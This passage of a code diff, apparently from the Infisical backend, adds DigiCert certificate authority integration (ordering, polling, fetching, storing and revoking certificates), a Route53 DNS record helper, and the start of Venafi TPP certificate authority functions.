} + + const digicertCa = castDbEntryToDigiCertCertificateAuthority(ca); + if (digicertCa.status !== CaStatus.ACTIVE) { + throw new BadRequestError({ message: `DigiCert CA is disabled [caId=${caId}]` }); + } + + const { productNameId } = digicertCa.configuration; + + const effectiveCommonName = commonName?.trim() || altNames.find((value) => value.trim().length > 0)?.trim() || ""; + if (!effectiveCommonName) { + throw new BadRequestError({ + message: `DigiCert requires a common name or at least one DNS SAN [caId=${caId}]` + }); + } + + let csrPem = csr?.trim(); + let privateKeyPem = ""; + + if (!csrPem) { + const alg = keyAlgorithmToAlgCfg(keyAlgorithm); + const leafKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]); + const skLeafObj = crypto.nativeCrypto.KeyObject.from(leafKeys.privateKey); + privateKeyPem = skLeafObj.export({ format: "pem", type: "pkcs8" }) as string; + + const csrObj = await x509.Pkcs10CertificateRequestGenerator.create({ + name: `CN=${effectiveCommonName}`, + keys: leafKeys, + signingAlgorithm: alg, + ...(altNames.length > 0 && { + extensions: [ + new x509.SubjectAlternativeNameExtension( + altNames.map((value) => ({ type: "dns" as TAltNameType, value })), + false + ) + ] + }) + }); + csrPem = csrObj.toString("pem"); + } + + const { apiKey, baseUrl } = await getDigiCertClientCredentials( + digicertCa.configuration.appConnectionId, + appConnectionDAL, + kmsService + ); + const client = createDigiCertApiClient(apiKey, baseUrl); + + const extraSans = altNames.filter((value) => value.toLowerCase() !== effectiveCommonName.toLowerCase()); + + const normalizedSignature = signatureAlgorithm?.toLowerCase() ?? 
"";
+  let signatureHash: "sha256" | "sha384" | "sha512" = "sha256";
+  if (normalizedSignature.includes("sha512")) signatureHash = "sha512";
+  else if (normalizedSignature.includes("sha384")) signatureHash = "sha384";
+
+  const validityDays = parseTtlToDays(ttl);
+
+  const baseOrderPayload = {
+    certificate: {
+      common_name: effectiveCommonName,
+      ...(extraSans.length > 0 ? { dns_names: extraSans } : {}),
+      csr: csrPem,
+      signature_hash: signatureHash
+    },
+    organization: { id: digicertCa.configuration.organizationId },
+    order_validity: { days: validityDays },
+    dcv_method: "dns-txt-token" as const,
+    skip_approval: true
+  };
+
+  const renewalIneligibleCodes = [
+    "order_not_eligible_for_renewal",
+    "order_not_renewable",
+    "renewal_window_closed",
+    "cannot_renew_expired_order",
+    "product_not_eligible_for_renewal"
+  ];
+  let orderResponse: Awaited<ReturnType<typeof client.placeOrder>>;
+  try {
+    orderResponse = await client.placeOrder(productNameId, {
+      ...baseOrderPayload,
+      ...(renewalOfOrderId ? { renewal_of_order_id: renewalOfOrderId } : {})
+    });
+  } catch (err) {
+    const message = (err as Error)?.message ?? 
""; + const isRenewalIneligible = + renewalOfOrderId !== undefined && renewalIneligibleCodes.some((code) => message.includes(code)); + if (isRenewalIneligible) { + logger.warn( + `DigiCert rejected renewal linkage (renewal_of_order_id=${renewalOfOrderId}) as not eligible; retrying as a fresh order [caId=${caId}]` + ); + orderResponse = await client.placeOrder(productNameId, baseOrderPayload); + } else { + throw err; + } + } + + return { + metadata: { + digicert: { + orderId: orderResponse.id, + certificateId: orderResponse.certificate_id, + productNameId, + organizationId: digicertCa.configuration.organizationId, + orderPlacedAt: new Date().toISOString() + } + }, + privateKey: privateKeyPem, + immediateCertificateId: orderResponse.certificate_id, + orderId: orderResponse.id + }; + }; + + const fetchAndAttachIssuedCertificate = async ({ + caId, + certificateRequest, + digicertCertificateId, + digicertOrderId, + encryptedPrivateKey, + isRenewal, + originalCertificateId + }: { + caId: string; + certificateRequest: { + id: string; + profileId?: string | null; + commonName?: string | null; + altNames?: string | null; + keyUsages?: string[] | null; + extendedKeyUsages?: string[] | null; + keyAlgorithm?: string | null; + signatureAlgorithm?: string | null; + }; + digicertCertificateId: number; + digicertOrderId: number; + encryptedPrivateKey?: Buffer; + isRenewal?: boolean; + originalCertificateId?: string; + }): Promise<{ certificateId: string; certificatePem: string }> => { + const ca = await certificateAuthorityDAL.findByIdWithAssociatedCa(caId); + if (!ca.externalCa || ca.externalCa.type !== CaType.DIGICERT) { + throw new BadRequestError({ message: "CA is not a DigiCert certificate authority" }); + } + const digicertCa = castDbEntryToDigiCertCertificateAuthority(ca); + + const { apiKey, baseUrl } = await getDigiCertClientCredentials( + digicertCa.configuration.appConnectionId, + appConnectionDAL, + kmsService + ); + const client = createDigiCertApiClient(apiKey, 
baseUrl); + + const pemBundle = await client.downloadCertificatePem(digicertCertificateId); + const { leaf, chain } = extractLeafAndChain(pemBundle); + + const certObj = new x509.X509Certificate(leaf); + const issued = extractIssuedCertificateFields(certObj); + + const certificateManagerKmsId = await getProjectKmsCertificateKeyId({ + projectId: ca.projectId, + projectDAL, + kmsService + }); + const kmsEncryptor = await kmsService.encryptWithKmsKey({ kmsId: certificateManagerKmsId }); + + const { cipherTextBlob: encryptedCertificate } = await kmsEncryptor({ + plainText: Buffer.from(new Uint8Array(certObj.rawData)) + }); + const { cipherTextBlob: encryptedCertificateChain } = await kmsEncryptor({ + plainText: Buffer.from(chain) + }); + + const createdCertificateId = await certificateDAL.transaction(async (tx) => { + const cert = await certificateDAL.create( + { + caId: ca.id, + profileId: certificateRequest.profileId ?? undefined, + status: CertStatus.ACTIVE, + friendlyName: issued.commonName || "", + commonName: issued.commonName || "", + altNames: issued.altNames.length > 0 ? issued.altNames.join(",") : "", + serialNumber: certObj.serialNumber, + notBefore: certObj.notBefore, + notAfter: certObj.notAfter, + keyUsages: issued.keyUsages, + extendedKeyUsages: issued.extendedKeyUsages, + keyAlgorithm: certificateRequest.keyAlgorithm ?? undefined, + signatureAlgorithm: certificateRequest.signatureAlgorithm ?? undefined, + projectId: ca.projectId, + externalMetadata: { + type: CaType.DIGICERT, + orderId: digicertOrderId + } satisfies TDigiCertExternalMetadata, + renewedFromCertificateId: isRenewal && originalCertificateId ? 
originalCertificateId : null + }, + tx + ); + + if (isRenewal && originalCertificateId) { + await certificateDAL.updateById(originalCertificateId, { renewedByCertificateId: cert.id }, tx); + } + + await certificateBodyDAL.create( + { + certId: cert.id, + encryptedCertificate, + encryptedCertificateChain + }, + tx + ); + + if (encryptedPrivateKey) { + await certificateSecretDAL.create( + { + certId: cert.id, + encryptedPrivateKey + }, + tx + ); + } + + return cert.id; + }); + + return { certificateId: createdCertificateId, certificatePem: leaf }; + }; + + const revokeCertificate = async ({ + caId, + serialNumber, + reason + }: { + caId: string; + serialNumber: string; + reason: CrlReason; + }) => { + const ca = await certificateAuthorityDAL.findByIdWithAssociatedCa(caId); + if (!ca.externalCa || ca.externalCa.type !== CaType.DIGICERT) { + throw new BadRequestError({ message: `CA is not a DigiCert certificate authority [caId=${caId}]` }); + } + + const cert = await certificateDAL.findOne({ caId, serialNumber }); + if (!cert) { + throw new NotFoundError({ + message: `Certificate not found for revocation [caId=${caId}] [serialNumber=${serialNumber}]` + }); + } + const parsedMetadata = DigiCertExternalMetadataSchema.safeParse(cert.externalMetadata); + if (!parsedMetadata.success) { + throw new BadRequestError({ + message: `Certificate has no DigiCert order reference in externalMetadata β€” cannot revoke on DigiCert [certificateId=${cert.id}]` + }); + } + const { orderId } = parsedMetadata.data; + + const digicertCa = castDbEntryToDigiCertCertificateAuthority(ca); + const { apiKey, baseUrl } = await getDigiCertClientCredentials( + digicertCa.configuration.appConnectionId, + appConnectionDAL, + kmsService + ); + const client = createDigiCertApiClient(apiKey, baseUrl); + + try { + await client.revokeOrder(orderId, `Revoked via Infisical β€” reason: ${reason}`); + } catch (err) { + const message = (err as Error)?.message ?? 
""; + if (message.includes("order_already_revoked") || message.includes("order_is_revoked")) { + logger.info( + `DigiCert order already revoked upstream β€” treating as success [caId=${caId}] [certificateId=${cert.id}] [orderId=${orderId}]` + ); + } else { + throw err; + } + } + + logger.info( + `DigiCert order revocation submitted [caId=${caId}] [certificateId=${cert.id}] [orderId=${orderId}] [reason=${reason}]` + ); + }; + + return { + createCertificateAuthority, + updateCertificateAuthority, + listCertificateAuthorities, + orderCertificateFromProfile, + fetchAndAttachIssuedCertificate, + revokeCertificate + }; +}; + +export type TDigiCertCertificateAuthorityFns = ReturnType; diff --git a/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-processor.ts b/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-processor.ts new file mode 100644 index 00000000000..737be4e9138 --- /dev/null +++ b/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-processor.ts @@ -0,0 +1,217 @@ +import { TCertificateRequests } from "@app/db/schemas"; +import { logger } from "@app/lib/logger"; +import { TAppConnectionDALFactory } from "@app/services/app-connection/app-connection-dal"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { decryptAppConnectionCredentials } from "@app/services/app-connection/app-connection-fns"; +import { getDigiCertApiBaseUrl } from "@app/services/app-connection/digicert/digicert-connection-fns"; +import { TDigiCertConnection } from "@app/services/app-connection/digicert/digicert-connection-types"; +import { TKmsServiceFactory } from "@app/services/kms/kms-service"; + +import { CertificateRequestStatus } from "../../certificate-common/certificate-constants"; +import { TCertificateRequestDALFactory } from "../../certificate-request/certificate-request-dal"; +import { + TAttachCertificateToRequestDTO, + 
TUpdateCertificateRequestStatusDTO +} from "../../certificate-request/certificate-request-types"; +import { TResourceMetadataDALFactory } from "../../resource-metadata/resource-metadata-dal"; +import { copyMetadataFromRequestToCertificate } from "../../resource-metadata/resource-metadata-fns"; +import { TCertificateAuthorityDALFactory } from "../certificate-authority-dal"; +import { createDigiCertApiClient, TDigiCertApiClient } from "./digicert-api-client"; +import { + DIGICERT_FINAL_ISSUED_STATUSES, + DigiCertOrderStatus, + DigiCertProcessorOutcome +} from "./digicert-certificate-authority-enums"; +import { + castDbEntryToDigiCertCertificateAuthority, + TDigiCertCertificateAuthorityFns +} from "./digicert-certificate-authority-fns"; +import { DigiCertCertificateRequestMetadataSchema } from "./digicert-certificate-authority-schemas"; + +export type TDigiCertCertificateRequestServiceDep = { + updateCertificateRequestStatus: (args: TUpdateCertificateRequestStatusDTO) => Promise; + attachCertificateToRequest: (args: TAttachCertificateToRequestDTO) => Promise; +}; + +export const DIGICERT_VALIDATION_TIMEOUT_MS = 24 * 60 * 60 * 1000; + +export type TDigiCertOrderMetadata = { + digicert: { + orderId: number; + certificateId?: number; + productNameId: string; + organizationId: number; + orderPlacedAt: string; + lastCheckedAt?: string; + lastCheckStatus?: string; + isRenewal?: boolean; + originalCertificateId?: string; + }; +}; + +export type TProcessDigiCertRequestDeps = { + certificateAuthorityDAL: Pick; + appConnectionDAL: Pick; + kmsService: Pick; + certificateRequestDAL: Pick; + certificateRequestService: TDigiCertCertificateRequestServiceDep; + resourceMetadataDAL: Pick; + digicertFns: Pick; +}; + +export type TProcessDigiCertRequestResult = + | { status: CertificateRequestStatus.ISSUED; certificateId: string; orderStatus: string } + | { status: CertificateRequestStatus.FAILED; orderStatus: string; reason: string } + | { status: 
CertificateRequestStatus.PENDING_VALIDATION; orderStatus: string } + | { status: DigiCertProcessorOutcome.Skipped; reason: string }; + +const getOrCreateClient = async ( + request: TCertificateRequests, + deps: Pick, + clientCache?: Map +): Promise => { + if (!request.caId) { + throw new Error(`certificate request is missing caId [certificateRequestId=${request.id}]`); + } + const cached = clientCache?.get(request.caId); + if (cached) return cached; + + const ca = await deps.certificateAuthorityDAL.findByIdWithAssociatedCa(request.caId); + const digicertCa = castDbEntryToDigiCertCertificateAuthority(ca); + const appConnection = await deps.appConnectionDAL.findById(digicertCa.configuration.appConnectionId); + if (!appConnection || appConnection.app !== AppConnection.DigiCert) { + throw new Error( + `DigiCert app connection missing or invalid [certificateRequestId=${request.id}] [caId=${request.caId}]` + ); + } + const credentials = (await decryptAppConnectionCredentials({ + orgId: appConnection.orgId, + projectId: appConnection.projectId, + encryptedCredentials: appConnection.encryptedCredentials, + kmsService: deps.kmsService + })) as TDigiCertConnection["credentials"]; + + const client = createDigiCertApiClient(credentials.apiKey, getDigiCertApiBaseUrl(credentials.region)); + clientCache?.set(request.caId, client); + return client; +}; + +export const processDigiCertPendingValidationRequest = async ( + deps: TProcessDigiCertRequestDeps, + request: TCertificateRequests, + clientCache?: Map +): Promise => { + if (!request.caId || !request.metadata) { + return { status: DigiCertProcessorOutcome.Skipped, reason: "missing caId or metadata" }; + } + + let rawMetadata: unknown; + try { + rawMetadata = JSON.parse(request.metadata); + } catch { + logger.warn(`DigiCert request metadata could not be parsed [certificateRequestId=${request.id}]`); + return { status: DigiCertProcessorOutcome.Skipped, reason: "unparseable metadata" }; + } + + const parseResult = 
DigiCertCertificateRequestMetadataSchema.safeParse(rawMetadata); + if (!parseResult.success) { + logger.warn( + { err: parseResult.error }, + `DigiCert request metadata failed schema validation [certificateRequestId=${request.id}]` + ); + return { status: DigiCertProcessorOutcome.Skipped, reason: "metadata did not match schema" }; + } + const parsed = parseResult.data as TDigiCertOrderMetadata; + + const age = Date.now() - new Date(parsed.digicert.orderPlacedAt).getTime(); + if (age >= DIGICERT_VALIDATION_TIMEOUT_MS) { + await deps.certificateRequestService.updateCertificateRequestStatus({ + certificateRequestId: request.id, + status: CertificateRequestStatus.FAILED, + errorMessage: "Validation timed out after 24h" + }); + logger.info(`DigiCert validation timed out [certificateRequestId=${request.id}]`); + return { status: CertificateRequestStatus.FAILED, orderStatus: "timeout", reason: "timeout" }; + } + + const client = await getOrCreateClient(request, deps, clientCache); + + const orderInfo = await client.getOrder(parsed.digicert.orderId); + let orderStatus = orderInfo.status?.toLowerCase() ?? "unknown"; + let newCertificateId = orderInfo.certificate?.id ?? parsed.digicert.certificateId; + let lastCheckStatus: string | undefined; + + if (orderStatus === DigiCertOrderStatus.Pending) { + const checkResult = await client.checkValidation(parsed.digicert.orderId); + orderStatus = checkResult.order_status?.toLowerCase() ?? orderStatus; + newCertificateId = checkResult.certificate_id ?? newCertificateId; + lastCheckStatus = checkResult.dcv_status ?? orderStatus; + } + + const isFinalisable = DIGICERT_FINAL_ISSUED_STATUSES.some((status) => status === orderStatus); + if (isFinalisable && newCertificateId) { + const { certificateId } = await deps.digicertFns.fetchAndAttachIssuedCertificate({ + caId: request.caId, + certificateRequest: { + id: request.id, + profileId: request.profileId, + commonName: request.commonName, + altNames: (request.altNames as string | null) ?? 
null, + keyUsages: request.keyUsages, + extendedKeyUsages: request.extendedKeyUsages, + keyAlgorithm: request.keyAlgorithm, + signatureAlgorithm: request.signatureAlgorithm + }, + digicertCertificateId: newCertificateId, + digicertOrderId: parsed.digicert.orderId, + encryptedPrivateKey: request.encryptedPrivateKey ?? undefined, + isRenewal: parsed.digicert.isRenewal, + originalCertificateId: parsed.digicert.originalCertificateId + }); + + await deps.certificateRequestService.attachCertificateToRequest({ + certificateRequestId: request.id, + certificateId + }); + await copyMetadataFromRequestToCertificate(deps.resourceMetadataDAL, { + certificateRequestId: request.id, + certificateId + }); + logger.info( + `DigiCert order issued, attached certificate [certificateRequestId=${request.id}] [certificateId=${certificateId}]` + ); + return { status: CertificateRequestStatus.ISSUED, certificateId, orderStatus }; + } + + if ( + orderStatus === DigiCertOrderStatus.Rejected || + orderStatus === DigiCertOrderStatus.Canceled || + orderStatus === DigiCertOrderStatus.Expired || + orderStatus === DigiCertOrderStatus.Revoked + ) { + await deps.certificateRequestService.updateCertificateRequestStatus({ + certificateRequestId: request.id, + status: CertificateRequestStatus.FAILED, + errorMessage: `DigiCert order ${orderStatus}` + }); + logger.info(`DigiCert order terminal state [certificateRequestId=${request.id}] [status=${orderStatus}]`); + return { + status: CertificateRequestStatus.FAILED, + orderStatus, + reason: `DigiCert order ${orderStatus}` + }; + } + + await deps.certificateRequestDAL.updateById(request.id, { + metadata: JSON.stringify({ + ...parsed, + digicert: { + ...parsed.digicert, + lastCheckedAt: new Date().toISOString(), + lastCheckStatus: lastCheckStatus ?? 
orderStatus + } + }) + }); + + return { status: CertificateRequestStatus.PENDING_VALIDATION, orderStatus }; +}; diff --git a/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-queue.ts b/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-queue.ts new file mode 100644 index 00000000000..5dc38586983 --- /dev/null +++ b/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-queue.ts @@ -0,0 +1,99 @@ +/* eslint-disable no-await-in-loop */ +import { getConfig } from "@app/lib/config/env"; +import { logger } from "@app/lib/logger"; +import { JOB_SCHEDULER_PREFIX, QueueJobs, QueueName, TQueueServiceFactory } from "@app/queue"; + +import { CertificateRequestStatus } from "../../certificate-common/certificate-constants"; +import { TCertificateRequestDALFactory } from "../../certificate-request/certificate-request-dal"; +import { CaType } from "../certificate-authority-enums"; +import { TDigiCertApiClient } from "./digicert-api-client"; +import { + processDigiCertPendingValidationRequest, + TProcessDigiCertRequestDeps +} from "./digicert-certificate-authority-processor"; + +const DIGICERT_POLL_CRON_SCHEDULE = "0 * * * *"; +const QUEUE_BATCH_SIZE = 50; + +type TDigiCertCertificateAuthorityQueueServiceFactoryDep = Omit< + TProcessDigiCertRequestDeps, + "certificateRequestDAL" +> & { + queueService: TQueueServiceFactory; + certificateRequestDAL: Pick; +}; + +export type TDigiCertCertificateAuthorityQueueServiceFactory = ReturnType< + typeof digicertCertificateAuthorityQueueServiceFactory +>; + +export const digicertCertificateAuthorityQueueServiceFactory = ({ + queueService, + ...processorDeps +}: TDigiCertCertificateAuthorityQueueServiceFactoryDep) => { + const appCfg = getConfig(); + + const init = async () => { + if (appCfg.isSecondaryInstance) { + return; + } + + queueService.start(QueueName.DigiCertOrderPolling, async () => { + try { + logger.info(`${QueueJobs.DigiCertOrderPolling}: 
queue task started`); + + const clientsByCaId = new Map(); + let processed = 0; + let issued = 0; + let failed = 0; + + let cursor: Date | undefined; + let hasMore = true; + while (hasMore) { + const requests = await processorDeps.certificateRequestDAL.findPendingValidationByCaType(CaType.DIGICERT, { + limit: QUEUE_BATCH_SIZE, + afterCreatedAt: cursor + }); + + if (requests.length === 0) break; + + for (const request of requests) { + processed += 1; + try { + const result = await processDigiCertPendingValidationRequest(processorDeps, request, clientsByCaId); + if (result.status === CertificateRequestStatus.ISSUED) issued += 1; + if (result.status === CertificateRequestStatus.FAILED) failed += 1; + } catch (error) { + logger.error(error, `DigiCert polling iteration failed [certificateRequestId=${request.id}]`); + } + } + + cursor = new Date(requests[requests.length - 1].createdAt); + hasMore = requests.length === QUEUE_BATCH_SIZE; + } + + logger.info( + `${QueueJobs.DigiCertOrderPolling}: completed [processed=${processed}] [issued=${issued}] [failed=${failed}]` + ); + } catch (error) { + logger.error(error, `${QueueJobs.DigiCertOrderPolling}: polling task failed`); + throw error; + } + }); + + await queueService.upsertJobScheduler( + QueueName.DigiCertOrderPolling, + `${JOB_SCHEDULER_PREFIX}:${QueueJobs.DigiCertOrderPolling}`, + { pattern: DIGICERT_POLL_CRON_SCHEDULE }, + { name: QueueJobs.DigiCertOrderPolling } + ); + + queueService.listen(QueueName.DigiCertOrderPolling, "failed", (_, err) => { + logger.error(err, `${QueueName.DigiCertOrderPolling}: failed`); + }); + }; + + return { + init + }; +}; diff --git a/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-schemas.ts b/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-schemas.ts new file mode 100644 index 00000000000..462b9dab429 --- /dev/null +++ b/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-schemas.ts @@ 
-0,0 +1,55 @@ +import { z } from "zod"; + +import { CaType } from "../certificate-authority-enums"; +import { + BaseCertificateAuthoritySchema, + GenericCreateCertificateAuthorityFieldsSchema, + GenericUpdateCertificateAuthorityFieldsSchema +} from "../certificate-authority-schemas"; + +export const DigiCertCertificateAuthorityConfigurationSchema = z.object({ + appConnectionId: z.string().uuid().trim().describe("DigiCert App Connection ID"), + organizationId: z + .number() + .int() + .positive() + .describe("CertCentral Organization ID that will be listed on issued certificates"), + productNameId: z + .string() + .trim() + .min(1) + .describe( + "The DigiCert product name_id used for issuance (e.g. ssl_plus, ssl_ev_plus). Fetch available products from GET /app-connections/digicert/:id/products." + ) +}); + +export const DigiCertCertificateAuthoritySchema = BaseCertificateAuthoritySchema.extend({ + type: z.literal(CaType.DIGICERT), + configuration: DigiCertCertificateAuthorityConfigurationSchema +}); + +export const CreateDigiCertCertificateAuthoritySchema = GenericCreateCertificateAuthorityFieldsSchema( + CaType.DIGICERT +).extend({ + configuration: DigiCertCertificateAuthorityConfigurationSchema +}); + +export const UpdateDigiCertCertificateAuthoritySchema = GenericUpdateCertificateAuthorityFieldsSchema( + CaType.DIGICERT +).extend({ + configuration: DigiCertCertificateAuthorityConfigurationSchema.optional() +}); + +export const DigiCertCertificateRequestMetadataSchema = z.object({ + digicert: z.object({ + orderId: z.number().int(), + certificateId: z.number().int().optional(), + productNameId: z.string(), + organizationId: z.number().int(), + orderPlacedAt: z.string(), + lastCheckedAt: z.string().optional(), + lastCheckStatus: z.string().optional(), + isRenewal: z.boolean().optional(), + originalCertificateId: z.string().uuid().optional() + }) +}); diff --git a/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-types.ts 
b/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-types.ts new file mode 100644 index 00000000000..dcafe46db67 --- /dev/null +++ b/backend/src/services/certificate-authority/digicert/digicert-certificate-authority-types.ts @@ -0,0 +1,16 @@ +import { z } from "zod"; + +import { + CreateDigiCertCertificateAuthoritySchema, + DigiCertCertificateAuthoritySchema, + DigiCertCertificateRequestMetadataSchema, + UpdateDigiCertCertificateAuthoritySchema +} from "./digicert-certificate-authority-schemas"; + +export type TDigiCertCertificateAuthority = z.infer; + +export type TCreateDigiCertCertificateAuthorityDTO = z.infer; + +export type TUpdateDigiCertCertificateAuthorityDTO = z.infer; + +export type TDigiCertCertificateRequestMetadata = z.infer; diff --git a/backend/src/services/certificate-authority/dns-providers/route53.ts b/backend/src/services/certificate-authority/dns-providers/route53.ts new file mode 100644 index 00000000000..cb14c242dce --- /dev/null +++ b/backend/src/services/certificate-authority/dns-providers/route53.ts @@ -0,0 +1,66 @@ +import { ChangeResourceRecordSetsCommand, GetHostedZoneCommand, Route53Client } from "@aws-sdk/client-route-53"; + +import { CustomAWSHasher } from "@app/lib/aws/hashing"; +import { crypto } from "@app/lib/crypto/cryptography"; +import { AWSRegion } from "@app/services/app-connection/app-connection-enums"; +import { getAwsConnectionConfig } from "@app/services/app-connection/aws/aws-connection-fns"; +import { TAwsConnectionConfig } from "@app/services/app-connection/aws/aws-connection-types"; + +export type TRoute53Record = { + name: string; + type: "CNAME" | "TXT" | "A" | "AAAA"; + value: string; + ttl?: number; + comment?: string; +}; + +const buildClient = async (connection: TAwsConnectionConfig) => { + // Route 53 is a global service β€” the region passed here only affects the signer, not the data plane. + // us-east-1 is AWS's canonical region for global services. 
+ const config = await getAwsConnectionConfig(connection, AWSRegion.US_EAST_1); + return new Route53Client({ + sha256: CustomAWSHasher, + useFipsEndpoint: crypto.isFipsModeEnabled(), + credentials: config.credentials, + region: config.region + }); +}; + +const changeRecord = async ( + connection: TAwsConnectionConfig, + hostedZoneId: string, + action: "UPSERT" | "DELETE", + record: TRoute53Record +) => { + const route53Client = await buildClient(connection); + const defaultComment = `${action === "UPSERT" ? "Upsert" : "Delete"} ${record.type} record for ${record.name}`; + const command = new ChangeResourceRecordSetsCommand({ + HostedZoneId: hostedZoneId, + ChangeBatch: { + Comment: record.comment ?? defaultComment, + Changes: [ + { + Action: action, + ResourceRecordSet: { + Name: record.name, + Type: record.type, + TTL: record.ttl ?? 300, + ResourceRecords: [{ Value: record.value }] + } + } + ] + } + }); + await route53Client.send(command); +}; + +export const route53UpsertRecord = (connection: TAwsConnectionConfig, hostedZoneId: string, record: TRoute53Record) => + changeRecord(connection, hostedZoneId, "UPSERT", record); + +export const route53DeleteRecord = (connection: TAwsConnectionConfig, hostedZoneId: string, record: TRoute53Record) => + changeRecord(connection, hostedZoneId, "DELETE", record); + +export const route53GetHostedZone = async (connection: TAwsConnectionConfig, hostedZoneId: string) => { + const route53Client = await buildClient(connection); + await route53Client.send(new GetHostedZoneCommand({ Id: hostedZoneId })); +}; diff --git a/backend/src/services/certificate-authority/venafi-tpp/venafi-tpp-certificate-authority-fns.ts b/backend/src/services/certificate-authority/venafi-tpp/venafi-tpp-certificate-authority-fns.ts new file mode 100644 index 00000000000..b8fabb7283a --- /dev/null +++ b/backend/src/services/certificate-authority/venafi-tpp/venafi-tpp-certificate-authority-fns.ts @@ -0,0 +1,950 @@ +/* eslint-disable no-await-in-loop */ +import 
* as x509 from "@peculiar/x509"; +import { AxiosError } from "axios"; +import RE2 from "re2"; + +import { TableName } from "@app/db/schemas"; +import { TGatewayV2ServiceFactory } from "@app/ee/services/gateway-v2/gateway-v2-service"; +import { crypto } from "@app/lib/crypto/cryptography"; +import { BadRequestError, NotFoundError } from "@app/lib/errors"; +import { ProcessedPermissionRules } from "@app/lib/knex/permission-filter-utils"; +import { logger } from "@app/lib/logger"; +import { OrgServiceActor } from "@app/lib/types"; +import { TAppConnectionDALFactory } from "@app/services/app-connection/app-connection-dal"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { decryptAppConnectionCredentials } from "@app/services/app-connection/app-connection-fns"; +import { TAppConnectionServiceFactory } from "@app/services/app-connection/app-connection-service"; +import { + authenticateVenafiTpp, + getVenafiTppHeaders, + requestWithVenafiTppGateway, + revokeVenafiTppToken +} from "@app/services/app-connection/venafi-tpp/venafi-tpp-connection-fns"; +import { TCertificateBodyDALFactory } from "@app/services/certificate/certificate-body-dal"; +import { TCertificateDALFactory } from "@app/services/certificate/certificate-dal"; +import { TCertificateSecretDALFactory } from "@app/services/certificate/certificate-secret-dal"; +import { + CertExtendedKeyUsage, + CertKeyAlgorithm, + CertKeyUsage, + CertStatus, + CertSubjectAlternativeNameType, + mapSanTypeToX509Type +} from "@app/services/certificate/certificate-types"; +import { calculateRenewalThreshold, parseTtlToDays } from "@app/services/certificate-common/certificate-issuance-utils"; +import { TCertificateProfileDALFactory } from "@app/services/certificate-profile/certificate-profile-dal"; +import { TKmsServiceFactory } from "@app/services/kms/kms-service"; +import { TProjectDALFactory } from "@app/services/project/project-dal"; +import { getProjectKmsCertificateKeyId } from 
"@app/services/project/project-fns"; + +import { TCertificateAuthorityDALFactory } from "../certificate-authority-dal"; +import { CaStatus, CaType } from "../certificate-authority-enums"; +import { keyAlgorithmToAlgCfg } from "../certificate-authority-fns"; +import { TExternalCertificateAuthorityDALFactory } from "../external-certificate-authority-dal"; +import { + TCreateVenafiTppCertificateAuthorityDTO, + TUpdateVenafiTppCertificateAuthorityDTO, + TVenafiTppCertificateAuthority +} from "./venafi-tpp-certificate-authority-types"; + +// -- SAN type codes for Venafi TPP SubjectAltNames -- +const VENAFI_SAN_TYPE_BY_SAN_TYPE: Record = { + [CertSubjectAlternativeNameType.DNS_NAME]: 2, + [CertSubjectAlternativeNameType.IP_ADDRESS]: 7, + [CertSubjectAlternativeNameType.EMAIL]: 1, + [CertSubjectAlternativeNameType.URI]: 6 +}; + +type TVenafiTppCertificateRequest = { + PolicyDN: string; + PKCS10: string; + ObjectName: string; + SubjectAltNames?: Array<{ Type: number; Name: string }>; + Origin?: string; + CASpecificAttributes?: Array<{ Name: string; Value: string }>; + WorkToDoTimeout?: number; + DisableAutomaticRenewal?: boolean; +}; + +type TVenafiTppRequestResponse = { + CertificateDN: string; + Guid: string; + CertificateData?: string; + Filename?: string; + Format?: string; +}; + +type TVenafiTppRetrieveResponse = { + CertificateData: string; + Filename: string; + Format: string; +}; + +const calculateFinalRenewBeforeDays = ( + profile: { apiConfig?: { autoRenew?: boolean; renewBeforeDays?: number } } | undefined, + ttl: string +): number | undefined => { + if (!profile?.apiConfig?.autoRenew) { + return undefined; + } + + const profileRenewBeforeDays = profile.apiConfig.renewBeforeDays; + if (profileRenewBeforeDays === undefined) { + return undefined; + } + + return calculateRenewalThreshold(profileRenewBeforeDays, parseTtlToDays(ttl)); +}; + +const normalizeTppUrl = (tppUrl: string): string => { + return tppUrl.replace(new RE2("\\/+$"), ""); +}; + +const 
sanToVenafiFormat = (san: { + type: CertSubjectAlternativeNameType; + value: string; +}): { + Type: number; + Name: string; +} => ({ + Type: VENAFI_SAN_TYPE_BY_SAN_TYPE[san.type], + Name: san.value +}); + +const getVenafiTppConnection = async ( + appConnectionId: string, + appConnectionDAL: Pick, + kmsService: Pick +) => { + const appConnection = await appConnectionDAL.findById(appConnectionId); + if (!appConnection) { + logger.error({ appConnectionId }, "Venafi TPP: App connection not found for credential decryption"); + throw new NotFoundError({ message: `App connection with ID '${appConnectionId}' not found` }); + } + + if (appConnection.app !== AppConnection.VenafiTpp) { + logger.error( + { appConnectionId, actualApp: appConnection.app }, + "Venafi TPP: App connection is not a Venafi TPP connection" + ); + throw new BadRequestError({ + message: `Connection with ID '${appConnectionId}' is not a Venafi TPP connection` + }); + } + + if (!appConnection.encryptedCredentials) { + logger.error({ appConnectionId }, "Venafi TPP: App connection has no encrypted credentials"); + throw new BadRequestError({ message: "App connection has no stored credentials" }); + } + + const credentials = (await decryptAppConnectionCredentials({ + orgId: appConnection.orgId, + kmsService, + encryptedCredentials: appConnection.encryptedCredentials, + projectId: appConnection.projectId + })) as { + tppUrl: string; + clientId: string; + username: string; + password: string; + }; + + return { credentials, gatewayId: appConnection.gatewayId ?? 
